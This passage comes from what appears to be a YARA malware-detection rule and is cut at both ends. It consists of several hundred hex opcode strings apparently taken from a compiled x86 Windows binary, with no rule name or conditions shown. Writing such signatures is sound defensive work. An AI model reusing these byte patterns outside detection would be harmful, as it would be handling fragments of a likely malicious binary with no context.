*/ $op178 = { 85c00f8464fcffffff74240ca1a87944 } /* Opcode */ $op179 = { 595985c0756068f4584300ff75b8a1a8 } /* Opcode */ $op180 = { 5f8b45fc5e5bc9c3558bec83e4f883ec } /* Opcode */ $op181 = { b0b44200c78424f4 } /* Opcode */ $op182 = { 595985c075365650a1a879440057ff90 } /* Opcode */ $op183 = { 8bd88b450c8bf85903c659895d108945 } /* Opcode */ $op184 = { 783b4400c7842494 } /* Opcode */ $op185 = { 595985c0741ba1a87944006858e44300 } /* Opcode */ $op186 = { f4404400c784249c } /* Opcode */ $op187 = { 57ff75088945c8a1a8794400ff90b8 } /* Opcode */ $op188 = { 50a1a8794400576864bf43006894c043 } /* Opcode */ $op189 = { 8b450c8b4d142bc883e90651ff75fc8d } /* Opcode */ $op190 = { 8b4e2485c90f84e6 } /* Opcode */ $op191 = { d4414400c78424bc } /* Opcode */ $op192 = { ff75f8a1a8794400576804c143006818 } /* Opcode */ $op193 = { 68e0094400ff75fcff91600100008b0d } /* Opcode */ $op194 = { 595985c00f8532020000ff75d4a1a879 } /* Opcode */ $op195 = { 564000c741700a284000c78130040000 } /* Opcode */ $op196 = { 508d44245450a1a8794400c744245818 } /* Opcode */ $op197 = { 595985c00f856a0700006828524300ff } /* Opcode */ $op198 = { b0694300c78424d8 } /* Opcode */ $op199 = { 983b4400c78424a4 } /* Opcode */ $op200 = { 08184300c78424e4 } /* Opcode */ $op201 = { a1a879440056ff750cff907c0100008b } /* Opcode */ $op202 = { 83c40cff75bcff75bc0fb705b8794400 } /* Opcode */ $op203 = { 68b8584300ff75b8a1a8794400ff9090 } /* Opcode */ $op204 = { 3935d47944000f859b } /* Opcode */ $op205 = { 595985c00f85950400006808544300ff } /* Opcode */ $op206 = { 83c4108944241c8d44242c5056ff7424 } /* Opcode */ $op207 = { 8944241ca1a8794400680829440056ff } /* Opcode */ $op208 = { 3b4300c7842438060000103b4300c784 } /* Opcode */ $op209 = { f17a4000c78188010000f8944100c781 } /* Opcode */ $op210 = { 837d0c007505e98d } /* Opcode */ $op211 = { b44300c78424600200000cb44300c784 } /* Opcode */ $op212 = { 143c4400c78424d4 } /* Opcode */ $op213 = { 595985c00f85870700006818524300ff } /* Opcode */ $op214 = { 40184300c78424f8 } /* Opcode */ $op215 = { a1a87944005756ff902c01000083c428 } /* Opcode */ $op216 = { 595985c00f859e020000ff75c4a1a879 } /* Opcode */ $op217 = { ff74242ca1a879440068c863430053ff } /* Opcode */ $op218 = { 8b413c3bc30f84e0 } /* Opcode */ $op219 = { babebff202b91204ca01a3a479440089 } /* Opcode */ $op220 = { 595985c00f8554010000a1a879440068 } /* Opcode */ $op221 = { 224300c784242403000018224300c784 } /* Opcode */ $op222 = { d83b4400c78424c0 } /* Opcode */ $op223 = { 53684ce34300568945c050a1a8794400 } /* Opcode */ $op224 = { 44ef4200c78424d4 } /* Opcode */ $op225 = { 7c3c4400c78424f4 } /* Opcode */ $op226 = { 598bf0598b4d0889750c85db7e6d578a } /* Opcode */ $op227 = { 874300c78424a803000008874300c784 } /* Opcode */ $op228 = { 84174300c78424bc } /* Opcode */ $op229 = { b8404400c7842490 } /* Opcode */ $op230 = { 8364241800c70500b04200222700008b } /* Opcode */ $op231 = { 836424140059598bd8beff7f000033c0 } /* Opcode */ $op232 = { 5f85c07404b001c9c3a1a87944005356 } /* Opcode */ $op233 = { 85c00f851f020000ff742424a1a87944 } /* Opcode */ $op234 = { 8bf0a1a87944006848b7420056ff9060 } /* Opcode */ $op235 = { 6868574300ff75b8a1a8794400ff9090 } /* Opcode */ $op236 = { 1cae4300c78424a8 } /* Opcode */ $op237 = { 68284300c78424f4 } /* Opcode */ $op238 = { 59598945f48b45fcff308b45fc83c004 } /* Opcode */ $op239 = { 8bf00fb705b879440050a1a879440068 } /* Opcode */ $op240 = { ac274300c78424c0 } /* Opcode */ $op241 = { 568d441b0250ff7514a1a8794400ff90 } /* Opcode */ $op242 = { 043c4400c78424d0 } /* Opcode */ $op243 = { 595985c00f85e70300006874544300ff } /* Opcode */ $op244 = { c4404400c7842494 } /* Opcode */ $op245 = { 74754000c7812004000082964100c781 } /* Opcode */ $op246 = { 78414400c78424ac } /* Opcode */ $op247 = { 986a4300c78424f4 } /* Opcode */ $op248 = { 595985c00f855603000068fc544300ff } /* Opcode */ $op249 = { f0f84200c78424bc } /* Opcode */ $op250 = { ff4b148b5f3a035d0c837da80059590f } /* Opcode */ $op251 = { e8274300c78424d0 } /* Opcode */ $op252 = { 895c2464895c2468ff90bc0200003d22 } /* Opcode */ $op253 = { 834b1cff5959eb178b4df00500f0ffff } /* Opcode */ $op254 = { a1a879440056ff9000040000a1a87944 } /* Opcode */ $op255 = { 83c40c6814594300ff7588a1a8794400 } /* Opcode */ $op256 = { fb4200c784243401000010fb4200c784 } /* Opcode */ $op257 = { a1a879440083c40cff742418ff907401 } /* Opcode */ $op258 = { 8975ec8975f0ff900c030000f7d81bc0 } /* Opcode */ $op259 = { 20af4300c78424f4 } /* Opcode */ $op260 = { 3c274300c78424a0 } /* Opcode */ $op261 = { 595985c00f855102000068f0554300ff } /* Opcode */ $op262 = { 595985c0754f68d45b4300ff7588a1a8 } /* Opcode */ $op263 = { 60ef4200c78424dc } /* Opcode */ $op264 = { 595985c00f85e20200006860554300ff } /* Opcode */ $op265 = { 10af4300c78424ec } /* Opcode */ $op266 = { 83c0083bc30f84ab } /* Opcode */ $op267 = { 85db7456ff75108bf0ff750ca1a87944 } /* Opcode */ $op268 = { d8ef4200c78424f4 } /* Opcode */ $op269 = { 70424400c78424d0 } /* Opcode */ $op270 = { 59598d4dec51568bf833c057508945fc } /* Opcode */ $op271 = { 59593bc37461a1a879440068dce54300 } /* Opcode */ $op272 = { 595985c00f85f60600006870524300ff } /* Opcode */ $op273 = { 68b0424300ff75f057ff905001000083 } /* Opcode */ $op274 = { 59598bd88d45f050565357897dfc57e9 } /* Opcode */ $op275 = { ff750c8bd8a1a87944006800b1420068 } /* Opcode */ $op276 = { 8d45ec50ff75fca1a8794400ff90f802 } /* Opcode */ $op277 = { 595983670400836708008b450c5fc9c3 } /* Opcode */ $op278 = { ff75f0a1a879440068f0c8430056ff50 } /* Opcode */ $op279 = { 595985c00f8517020000ff75c0a1a879 } /* Opcode */ $op280 = { 0f825affffff5f5e8be55dc3558bec83 } /* Opcode */ $op281 = { 8975e48975e88975fcff90bc02000085 } /* Opcode */ $op282 = { ff4424148d474450a1a8794400ff9098 } /* Opcode */ $op283 = { 30174300c78424ac } /* Opcode */ $op284 = { 595985c00f85a407000068fc514300ff } /* Opcode */ $op285 = { 837d100159598bf07510ff750cff35bc } /* Opcode */ $op286 = { 595985c00f85f10500006824534300ff } /* Opcode */ $op287 = { fc274300c78424d4 } /* Opcode */ $op288 = { 88f84200c78424a8 } /* Opcode */ $op289 = { b24300c78424d401000008b24300c784 } /* Opcode */ $op290 = { 30ae4300c78424ac } /* Opcode */ $op291 = { 53ff75088bf0a1a8794400ff90780200 } /* Opcode */ $op292 = { 8c404400c784248c } /* Opcode */ $op293 = { 83c4188945fc837dfc00746c8b45fc81 } /* Opcode */ $op294 = { 8b45fc8b008d44000250ff7508a1a879 } /* Opcode */ $op295 = { c8ad4300c7842490 } /* Opcode */ $op296 = { 64174300c78424b8 } /* Opcode */ $op297 = { 85c07524ff74240ca1a8794400ff7508 } /* Opcode */ $op298 = { 595985c00f85bc0600006894524300ff } /* Opcode */ $op299 = { 895dd4897ddc895de0895de4ff90bc02 } /* Opcode */ $op300 = { f4b34200c78424b4 } /* Opcode */ $op301 = { 8b45fc0fb7400483f8250f85d9 } /* Opcode */ $op302 = { 59595e837df40074198b470805001000 } /* Opcode */ $op303 = { 50a1a87944005356ff90bc } /* Opcode */ $op304 = { 8b463a03c350a1a8794400ff90040400 } /* Opcode */ $op305 = { 44f84200c7842498 } /* Opcode */ $op306 = { 595985c00f85fb07000068d4514300ff } /* Opcode */ $op307 = { ff75fca1a8794400576804c643006820 } /* Opcode */ $op308 = { 90414400c78424b0 } /* Opcode */ $op309 = { 70164300c7842484 } /* Opcode */ $op310 = { 1cf04200c784240001000038f04200c7 } /* Opcode */ $op311 = { 68b4574300ff75b8a1a8794400ff9090 } /* Opcode */ $op312 = { e0f94200c78424f4 } /* Opcode */ $op313 = { 83c40c68fc8043008d45c050a1a87944 } /* Opcode */ $op314 = { 59595656ff74243889442424508d4424 } /* Opcode */ $op315 = { 8b45f88038030f85fc } /* Opcode */ $op316 = { 14434400c78424e4 } /* Opcode */ $op317 = { 30ee4200c7842488 } /* Opcode */ $op318 = { 85c07405e9500100006a018d45e8508d } /* Opcode */ $op319 = { 59598bf8895df4895df8c645ff01eb51 } /* Opcode */ $op320 = { cc174300c78424d4 } /* Opcode */ $op321 = { 68b34200c7842498 } /* Opcode */ $op322 = { 354300c784247804000010354300c784 } /* Opcode */ $op323 = { 10d54000b89ba64100898174030000c7 } /* Opcode */ $op324 = { 48424400c78424c8 } /* Opcode */ $op325 = { 85c07535a1a8794400538db8c4010000 } /* Opcode */ $op326 = { 68feff0000ff750889442424a1a87944 } /* Opcode */ $op327 = { b76c4000c781500200003e6f4000c741 } /* Opcode */ $op328 = { 395d14598bf0598975f87e36578b4510 } /* Opcode */ $op329 = { 8bf80fb705b879440050a1a879440068 } /* Opcode */ $op330 = { 595985c00f851808000068c8514300ff } /* Opcode */ $op331 = { a24300c78424440b000008a24300c784 } /* Opcode */ $op332 = { ff75f8a1a8794400576898c0430068b0 } /* Opcode */ $op333 = { 595985c00f856901000068d0564300ff } /* Opcode */ $op334 = { d8274300c78424cc } /* Opcode */ $op335 = { a1a879440083c450ff75fc5768a4c643 } /* Opcode */ $op336 = { 663bd8740a46460fb7066685c075d333 } /* Opcode */ $op337 = { 98b44200c78424ec } /* Opcode */ $op338 = { 85c00f84f2feffffa1a879440053ff75 } /* Opcode */ $op339 = { 595985c00f85390300006814554300ff } /* Opcode */ $op340 = { ff35d079440089442428684474430056 } /* Opcode */ $op341 = { 59598bf88d44241450ff7424188d4424 } /* Opcode */ $op342 = { a1a87944008d5e0c68a8dd430053ff90 } /* Opcode */ $op343 = { ff90c403000059598d45e050a1a87944 } /* Opcode */ $op344 = { 5353ff35bc7944008945d4a1a8794400 } /* Opcode */ $op345 = { 68478000006a008944242450a1a87944 } /* Opcode */ $op346 = { 5068000010808d44245050a1a8794400 } /* Opcode */ $op347 = { 543c4400c78424e8 } /* Opcode */ $op348 = { 595985c00f851201000068ec5a4300ff } /* Opcode */ $op349 = { d4164300c784249c } /* Opcode */ $op350 = { a8ee4200c78424a4 } /* Opcode */ $op351 = { f83b4400c78424cc } /* Opcode */ $op352 = { 595985c00f8571010000a1a879440068 } /* Opcode */ $op353 = { f4ee4200c78424bc } /* Opcode */ $op354 = { 808d45f850a1a87944006a00ff5044c9 } /* Opcode */ $op355 = { 83c40c8b45f85e5f5bc9c3558bec51a1 } /* Opcode */ $op356 = { 895de4895de8ff90bc02000085c07d07 } /* Opcode */ $op357 = { ff75148b45fc83c00450ff750ca1a879 } /* Opcode */ $op358 = { 30b44200c78424c8 } /* Opcode */ $op359 = { fc694300c78424e0 } /* Opcode */ $op360 = { 68274300c78424ac } /* Opcode */ $op361 = { bcef4200c78424f0 } /* Opcode */ $op362 = { a1a879440083c440ff7510681cb74200 } /* Opcode */ $op363 = { 7cb44200c78424e0 } /* Opcode */ $op364 = { 24284300c78424e0 } /* Opcode */ $op365 = { a0b44200c78424f0 } /* Opcode */ $op366 = { 50a1a879440051ff90b8 } /* Opcode */ $op367 = { 8d47fc50a1a879440053ff90b4 } /* Opcode */ $op368 = { 5c274300c78424a8 } /* Opcode */ $op369 = { 8975e48975e8ff90bc0200003d220000 } /* Opcode */ $op370 = { 59598945ec0fb705b879440050687444 } /* Opcode */ $op371 = { 56ff7424188bf8a1a879440057ff90d0 } /* Opcode */ $op372 = { 194300c78424100100001c194300c784 } /* Opcode */ $op373 = { a1a87944005653ff902c01000083c41c } /* Opcode */ $op374 = { 8d4744685c61430050a1a8794400ff90 } /* Opcode */ $op375 = { 8b46048b0d987944008988c4 } /* Opcode */ $op376 = { a1a8794400536800080000ff7508ff90 } /* Opcode */ $op377 = { 5150a1a8794400ff90b8 } /* Opcode */ $op378 = { 5150a1a8794400ff90b8 } /* Opcode */ $op379 = { ac174300c78424c8 } /* Opcode */ $op380 = { 83c410ff75108945f88d45dc50a1a879 } /* Opcode */ $op381 = { 595985c00f85120100006850574300ff } /* Opcode */ $op382 = { 0f8260ffffffa1a879440068a0384400 } /* Opcode */ $op383 = { 8b44240c83c04468dc7f430050a1a879 } /* Opcode */ $op384 = { bcb44200c78424f8 } /* Opcode */ $op385 = { 895dcc894dd0895dd8895ddcff90bc02 } /* Opcode */ $op386 = { 20274300c7842498 } /* Opcode */ $op387 = { 59598bf88d44242050ff7424248d4424 } /* Opcode */ $op388 = { 59598bf08d45fc50ff75fc8d45f4566a } /* Opcode */ $op389 = { a1a879440083c40cff74240cff907401 } /* Opcode */ $op390 = { e989feffffa1a87944005357685cb042 } /* Opcode */ $op391 = { 28af4300c78424f8 } /* Opcode */ $op392 = { 595985c00f856e0200006870594300ff } /* Opcode */ $op393 = { ff75108bf8a1a87944006810b7420056 } /* Opcode */ $op394 = { 3935d47944000f85c6 } /* Opcode */ $op395 = { 924300c78424a006000010924300c784 } /* Opcode */ $op396 = { ecee4200c78424b8 } /* Opcode */ $op397 = { 595985c00f852f01000068c85a4300ff } /* Opcode */ $op398 = { 8b4e24c1e10251ff75fc8945f850a1a8 } /* Opcode */ $op399 = { 6a228d45ec50ff757ca1a8794400c745 } /* Opcode */ $op400 = { 58414400c78424a8 } /* Opcode */ $op401 = { 897dc4897dc8ff904803000085c00f85 } /* Opcode */ $op402 = { d03b4400c78424bc } /* Opcode */ $op403 = { 895c2464895c2468ff90bc02000085c0 } /* Opcode */ $op404 = { dcae4300c78424d8 } /* Opcode */ $op405 = { a1a8794400538b5d08565768feff0000 } /* Opcode */ $op406 = { 595985c00f858b0200006858594300ff } /* Opcode */ $op407 = { 943c4400c78424fc } /* Opcode */ $op408 = { b0ee4200c78424a8 } /* Opcode */ $op409 = { ff90bc02000085c0a1a87944007412ff } /* Opcode */ $op410 = { ff75108945f80fb7450c50a1a8794400 } /* Opcode */ $op411 = { 8b1584a042008991a4020000c7813802 } /* Opcode */ $op412 = { 895e10895e14ff90bc02000085c0742a } /* Opcode */ $op413 = { ff7510a1a87944006834b742005657ff } /* Opcode */ $op414 = { 595985c00f854d0700006844524300ff } /* Opcode */ $op415 = { 30ef4200c78424d0 } /* Opcode */ $op416 = { 595985c00f85c00100006864564300ff } /* Opcode */ $op417 = { 94ee4200c78424a0 } /* Opcode */ $op418 = { 8b6c24248b5c242059598bf8beff7f00 } /* Opcode */ $op419 = { 33db395d14598bf0598975fc7e2e8b45 } /* Opcode */ $op420 = { ff900c030000f7d81bc0f7d02345fc5f } /* Opcode */ $op421 = { 24b44200c78424c4 } /* Opcode */ $op422 = { 803b4400c7842498 } /* Opcode */ $op423 = { 57ff75088945e0a1a8794400ff90b8 } /* Opcode */ $op424 = { ff75fca1a8794400576838c643006850 } /* Opcode */ $op425 = { 68e0574300ff75b8a1a8794400ff9090 } /* Opcode */ $op426 = { 8b45fc8338040f8ee9 } /* Opcode */ $op427 = { 38b44200c78424cc } /* Opcode */ $op428 = { ff742448a1a879440053ff902c010000 } /* Opcode */ $op429 = { 4c694300c78424c8 } /* Opcode */ $op430 = { 85c07402eb60ff75f4ff7518ff7508a1 } /* Opcode */ $op431 = { 6c434400c78424f4 } /* Opcode */ $op432 = { a1a8794400682ce54300ff75f8ff9090 } /* Opcode */ $op433 = { 8b44242083c00450ff7508a1a8794400 } /* Opcode */ $op434 = { a1a8794400595968a86b440068e06b44 } /* Opcode */ $op435 = { 28ee4200c7842484 } /* Opcode */ $op436 = { 85c074258d45f450a1a8794400ff90a4 } /* Opcode */ $op437 = { a1a879440056ff90d0030000a1a87944 } /* Opcode */ $op438 = { ff7508a1a8794400ff7308ff909c } /* Opcode */ $op439 = { e9b0feffffa1a879440053576850b042 } /* Opcode */ $op440 = { 598945f8598d45fc508d45f4508d45ec } /* Opcode */ $op441 = { 8bf8a1d079440033f65959897c24203b } /* Opcode */ $op442 = { 8975d88975e48975e8ff90bc02000053 } /* Opcode */ $op443 = { 59598bf88d45f450565753895dfc53e9 } /* Opcode */ $op444 = { c0174300c78424d0 } /* Opcode */ $op445 = { 8bf083c40c3bf375148d45fc50a1a879 } /* Opcode */ $op446 = { 595985c00f853e0400006848544300ff } /* Opcode */ $op447 = { e8ae4300c78424dc } /* Opcode */ $op448 = { 80ae4300c78424c0 } /* Opcode */ $op449 = { c7430c20020000895df0ff506853ff75 } /* Opcode */ $op450 = { e962feffffa1a879440053576864b042 } /* Opcode */ $op451 = { 595985c00f852605000068ac534300ff } /* Opcode */ $op452 = { 668b4d0a663bc874c7464666833e000f } /* Opcode */ $op453 = { 595985c00f85ec04000068c8534300ff } /* Opcode */ $op454 = { c0414400c78424b8 } /* Opcode */ $op455 = { 85c075d68d45c050a1a8794400ff501c } /* Opcode */ $op456 = { 40284300c78424e8 } /* Opcode */ $op457 = { 14284300c78424dc } /* Opcode */ $op458 = { ff75f8a1a87944005768d0c0430068e4 } /* Opcode */ $op459 = { ff75108bf8ff750ca1a879440068b460 } /* Opcode */ $op460 = { b03b4400c78424b0 } /* Opcode */ $op461 = { 836508008365f8008bd8668b46026648 } /* Opcode */ $op462 = { 595985c07415b301a1a87944005657ff } /* Opcode */ $op463 = { 59595656578bd8538d45f450a1a87944 } /* Opcode */ $op464 = { 595985c0757968d4584300ff75b8a1a8 } /* Opcode */ $op465 = { 595985c00f855b040000682c544300ff } /* Opcode */ $op466 = { a1a87944005657beff7f000056ff7508 } /* Opcode */ $op467 = { a1a87944005657beff7f000056ff7508 } /* Opcode */ $op468 = { 83c40c5f33c05e5dc3558bec83e4f883 } /* Opcode */ $op469 = { 59595f5ec3558bec83ec286a0a8d45d8 } /* Opcode */ $op470 = { a1a8794400689477440056ff90740300 } /* Opcode */ $op471 = { 595985c0754733c0668945b033c08d7d } /* Opcode */ $op472 = { 40694300c78424c4 } /* Opcode */ $op473 = { 595985c00f85300700006850524300ff } /* Opcode */ $op474 = { 8d45dc5068000108008d45fc50a1a879 } /* Opcode */ $op475 = { a14300c78424f80a00000ca14300c784 } /* Opcode */ $op476 = { d0ae4300c78424d4 } /* Opcode */ $op477 = { 30404400c7842484 } /* Opcode */ $op478 = { f8264300c784248c } /* Opcode */ $op479 = { e937feffff558bec83e4f881ec9c0100 } /* Opcode */ $op480 = { 04fa4200c78424fc } /* Opcode */ $op481 = { 20414400c78424a4 } /* Opcode */ $op482 = { 80434400c78424f8 } /* Opcode */ $op483 = { 34774000c781a4030000e3f940008991 } /* Opcode */ $op484 = { 104000c7810c040000ae2b4000c781c8 } /* Opcode */ $op485 = { 895c245c895c2460ff900c03000085c0 } /* Opcode */ $op486 = { b23e4000c7814c020000361b4000c781 } /* Opcode */ $op487 = { 595985c00f85040400006868544300ff } /* Opcode */ $op488 = { bc164300c7842498 } /* Opcode */ $op489 = { 50a1a8794400ff901c01000083c41ceb } /* Opcode */ $op490 = { dc684300c78424b4 } /* Opcode */ $op491 = { 3cf94200c78424d0 } /* Opcode */ $op492 = { b8f94200c78424e8 } /* Opcode */ $op493 = { cc274300c78424c8 } /* Opcode */ $op494 = { 3b05d8794400751b8b4604ff80b8 } /* Opcode */ $op495 = { ff750c8bd8a1a87944006880b0420068 } /* Opcode */ $op496 = { 83c4508d45f450a1a8794400ff90f801 } /* Opcode */ $op497 = { 58424400c78424cc } /* Opcode */ $op498 = { 817c2410102700000f8fd8 } /* Opcode */ $op499 = { 895de0895de4ff90bc02000089450c3d } /* Opcode */ $op500 = { 8b45080500f0ffff89461c53ff7708e8 } /* Opcode */ $op501 = { 50a1a87944005668306443005653ff90 } /* Opcode */ $op502 = { a1a87944008b405083c40c3bc3740b8d } /* Opcode */ $op503 = { 83c40c834b0c048b075e5b5fc9c3558b } /* Opcode */ $op504 = { 72b6ff75f8a1a8794400ff7508ff902c } /* Opcode */ $op505 = { f0ad4300c7842498 } /* Opcode */ $op506 = { b4264300c7842484 } /* Opcode */ $op507 = { 595985c00f858e010000a1a879440068 } /* Opcode */ $op508 = { 38b34200c7842490 } /* Opcode */ $op509 = { ff75108bf8ff750ca1a879440068d85f } /* Opcode */ $op510 = { 50ee4200c7842494 } /* Opcode */ $op511 = { 8cae4300c78424c4 } /* Opcode */ $op512 = { 7cf94200c78424dc } /* Opcode */ $op513 = { ff742454a1a879440068406343006848 } /* Opcode */ $op514 = { ff750c50a1a8794400ff904001000059 } /* Opcode */ $op515 = { 14274300c7842494 } /* Opcode */ $op516 = { 89463a85c0744f897e288b7e3a037d08 } /* Opcode */ $op517 = { c8674300c7842484 } /* Opcode */ $op518 = { 3d230000c0740b3d050000800f85df } /* Opcode */ $op519 = { 3d230000c075618b45fc8d4400025089 } /* Opcode */ $op520 = { 83c41489451083f8ff0f84b6 } /* Opcode */ $op521 = { 595985c00f853402000068c0594300ff } /* Opcode */ $op522 = { 8974247489742478ff90bc02000085c0 } /* Opcode */ $op523 = { 8974247489742478ff90bc02000085c0 } /* Opcode */ $op524 = { a170a04200898128010000a19ca04200 } /* Opcode */ $op525 = { 895db0895db4ff90bc020000bf340000 } /* Opcode */ $op526 = { 83c414c60437008bc75f5ec3558bec83 } /* Opcode */ $op527 = { ff900c0300003d220000c00f8586 } /* Opcode */ $op528 = { 85c00f84a9fdffffff742418a1a87944 } /* Opcode */ $op529 = { 7c164300c7842488 } /* Opcode */ $op530 = { 59974100c7416cf8184000c781340100 } /* Opcode */ $op531 = { 8b48103bcb0f84eb } /* Opcode */ $op532 = { 8944241c8d474450ff750ca1a8794400 } /* Opcode */ $op533 = { 85c075138b45f0668378023a7509668b } /* Opcode */ $op534 = { 2a4300c7842468010000102a4300c784 } /* Opcode */ $op535 = { c8ee4200c78424ac } /* Opcode */ $op536 = { 83c40c6a0a83c71057568d45ec50ff75 } /* Opcode */ $op537 = { 314300c78424500300000c314300c784 } /* Opcode */ $op538 = { 80184300c7842400010000a4184300c7 } /* Opcode */ $op539 = { ff7608a1a8794400ff50788bd8a1a879 } /* Opcode */ $op540 = { 1c6a4300c78424e4 } /* Opcode */ $op541 = { a1a87944006850e5430053ff9090 } /* Opcode */ $op542 = { 595985c00f8551020000689c594300ff } /* Opcode */ $op543 = { 8bd80fb705b879440050a1a879440068 } /* Opcode */ $op544 = { 18684300c7842494 } /* Opcode */ $op545 = { 8975dc8975e08975f4ff90f8 } /* Opcode */ $op546 = { 595985c00f85c50200006828594300ff } /* Opcode */ $op547 = { e0ee4200c78424b4 } /* Opcode */ $op548 = { 4e914000a1cca04200898154030000c7 } /* Opcode */ $op549 = { a34300c784248c0b00000ca34300c784 } /* Opcode */ $op550 = { 5cae4300c78424b8 } /* Opcode */ $op551 = { 68345b4300ff7588a1a8794400ff9090 } /* Opcode */ $op552 = { 595985c00f85dd01000068245a4300ff } /* Opcode */ $op553 = { 595985c00f85ad030000688c544300ff } /* Opcode */ $op554 = { 83c424ff4e248b4624744f6a01c1e002 } /* Opcode */ $op555 = { 595985c00f859f06000068b0524300ff } /* Opcode */ $op556 = { 5f85c0740432c0c9c3568d45f850ff75 } /* Opcode */ $op557 = { 68feff0000ff75088944241ca1a87944 } /* Opcode */ $op558 = { 6a2f8d45b850ff757ca1a8794400c745 } /* Opcode */ $op559 = { 688c41430050a1a879440053ff905001 } /* Opcode */ $op560 = { 8c164300c784248c } /* Opcode */ $op561 = { ecef4200c78424f8 } /* Opcode */ $op562 = { 83c414381db17944007459a1a8794400 } /* Opcode */ $op563 = { ff75f88bf8ff750ca1a8794400687014 } /* Opcode */ $op564 = { 57ff751056ff909c02000053ff76088b } /* Opcode */ $op565 = { 595985c07536684c584300ff75b8a1a8 } /* Opcode */ $op566 = { 595985c00f85ff0200006848554300ff } /* Opcode */ $op567 = { d6224100c7811801 } /* Opcode */ $op568 = { 686a4300c78424ec } /* Opcode */ $op569 = { 8975b88975bcff900c03000085c00f85 } /* Opcode */ $op570 = { 568bd8a1a879440068d0b8410053ff90 } /* Opcode */ $op571 = { 8b0da8794400536689450aff91e8 } /* Opcode */ $op572 = { 6820b14200683cb142008bf0a1a87944 } /* Opcode */ $op573 = { 14b44200c78424bc } /* Opcode */ $op574 = { 595985c00f850e0600006810534300ff } /* Opcode */ $op575 = { 595985c074156a005750a1a879440056 } /* Opcode */ $op576 = { 08f04200c78424fc } /* Opcode */ $op577 = { a1a879440083c450ff75fc576864c743 } /* Opcode */ $op578 = { a46a4300c78424f8 } /* Opcode */ $op579 = { 8c3c4400c78424f8 } /* Opcode */ $op580 = { 8bf8a1a8794400684780000053ff90b8 } /* Opcode */ $op581 = { 595985c0757ba1a87944006830de4300 } /* Opcode */ $op582 = { 83c410894424108d4424245056ff7424 } /* Opcode */ $op583 = { 903b4400c78424a0 } /* Opcode */ $op584 = { bc3b4400c78424b4 } /* Opcode */ $op585 = { 8945fc8d474450ff7510a1a879440068 } /* Opcode */ $op586 = { 9c434400c78424fc } /* Opcode */ $op587 = { ff75108bf8a1a879440068dcb6420056 } /* Opcode */ $op588 = { 3c434400c78424e8 } /* Opcode */ $op589 = { 595985c0754da1a8794400687cde4300 } /* Opcode */ $op590 = { 6888574300ff75b8a1a8794400ff9090 } /* Opcode */ $op591 = { 94ef4200c78424e8 } /* Opcode */ $op592 = { 68b45b440050a1a879440053ff905001 } /* Opcode */ $op593 = { ff75106a00ff750ca1a8794400ff909c } /* Opcode */ $op594 = { ff75106a00ff750ca1a8794400ff909c } /* Opcode */ $op595 = { a1a879440083c450ff742418687c6343 } /* Opcode */ $op596 = { a43b4400c78424ac } /* Opcode */ $op597 = { 59164000c781a0010000bc2f4000a188 } /* Opcode */ $op598 = { 85c0754e50ff742414a1a8794400683c } /* Opcode */ $op599 = { a4174300c78424c4 } /* Opcode */ $op600 = { 30274300c784249c } /* Opcode */ $op601 = { 740ac705d479440006 } /* Opcode */ $op602 = { 595985c00f85a30100006878564300ff } /* Opcode */ $op603 = { 18ef4200c78424c8 } /* Opcode */ $op604 = { 84ef4200c78424e4 } /* Opcode */ $op605 = { dcb44200c7842400010000ecb44200c7 } /* Opcode */ $op606 = { 59598bd8ff74bd88a1a879440068d006 } /* Opcode */ $op607 = { 60184300c78424fc } /* Opcode */ $op608 = { 85c0752bff7510a1a8794400ff750cff } /* Opcode */ $op609 = { 8945f0668b45ec59668945ee598d45ec } /* Opcode */ $op610 = { 0f8252ffffffa1a879440053ff7508ff } /* Opcode */ $op611 = { ff7510a1a879440056ff907402000083 } /* Opcode */ $op612 = { 5c434400c78424f0 } /* Opcode */ $op613 = { 68545b4300ff7588a1a8794400ff9090 } /* Opcode */ $op614 = { 595985c00f85b7050000684c534300ff } /* Opcode */ $op615 = { a1a879440056536a0468f8a04200ff90 } /* Opcode */ $op616 = { 595985c00f85c50200006894554300ff } /* Opcode */ $op617 = { 59598945fc8b45f4484850ff75188b45 } /* Opcode */ $op618 = { 595985c00f851c0300006838554300ff } /* Opcode */ $op619 = { 83c41889458c837d8c000f8407040000 } /* Opcode */ $op620 = { 595985c00f851a010000a1a879440068 } /* Opcode */ $op621 = { 595985c00f85d40500006838534300ff } /* Opcode */ $op622 = { a1a87944006808624400ff75f856ff90 } /* Opcode */ $op623 = { c8f94200c78424ec } /* Opcode */ $op624 = { ff75f0a1a87944005368b4c8430068c8 } /* Opcode */ $op625 = { ff75eca1a879440068e8c7430056ff50 } /* Opcode */ $op626 = { 85c0754d8b450c668378023f50a1a879 } /* Opcode */ $op627 = { 66837938020f86d5 } /* Opcode */ $op628 = { ff75f4a1a8794400576820c84300682c } /* Opcode */ $op629 = { ff75d08b4df88b45ccff751403c10345 } /* Opcode */ $op630 = { 68805b4300ff7588a1a8794400ff9090 } /* Opcode */ $op631 = { 4c274300c78424a4 } /* Opcode */ $op632 = { a1a879440068e44443005653ff900801 } /* Opcode */ $op633 = { 58ef4200c78424d8 } /* Opcode */ $op634 = { 8d8500feffff689880430068ff } /* Opcode */ $op635 = { 595985c00f859003000068ac544300ff } /* Opcode */ $op636 = { 8b45fc8d048603433a50a1a8794400ff } /* Opcode */ $op637 = { 54684300c784249c } /* Opcode */ $op638 = { 68b0464300ff75088bf8a1a8794400ff } /* Opcode */ $op639 = { 643b4400c784248c } /* Opcode */ $op640 = { 894424608b44244883c04468cc7f4300 } /* Opcode */ $op641 = { 595985c00f859a0500006860534300ff } /* Opcode */ $op642 = { a1a879440053ff7508ff90b8 } /* Opcode */ $op643 = { 8b5d1085c07535a1a8794400538db8c4 } /* Opcode */ $op644 = { a1a879440056ff5028a1a87944006a13 } /* Opcode */ $op645 = { 2c3c4400c78424dc } /* Opcode */ $op646 = { 443c4400c78424e4 } /* Opcode */ $op647 = { 08ae4300c78424a4 } /* Opcode */ $op648 = { 94694300c78424d4 } /* Opcode */ $op649 = { 83c8ffe95c010000836508008d450850 } /* Opcode */ $op650 = { ff75fca1a87944006838b04200ff7514 } /* Opcode */ $op651 = { 71324000c7814c0100006a6b4000a1d4 } /* Opcode */ $op652 = { 3c684300c7842498 } /* Opcode */ $op653 = { 595985c00f854c01000068a45a4300ff } /* Opcode */ $op654 = { c0ae4300c78424d0 } /* Opcode */ $op655 = { 703b4400c7842490 } /* Opcode */ $op656 = { 595985c07520a1a87944005753ff9060 } /* Opcode */ $op657 = { e43b4400c78424c4 } /* Opcode */ $op658 = { d4f84200c78424b8 } /* Opcode */ $op659 = { a18ca042008981bc020000a190a04200 } /* Opcode */ $op660 = { 64ee4200c7842498 } /* Opcode */ $op661 = { 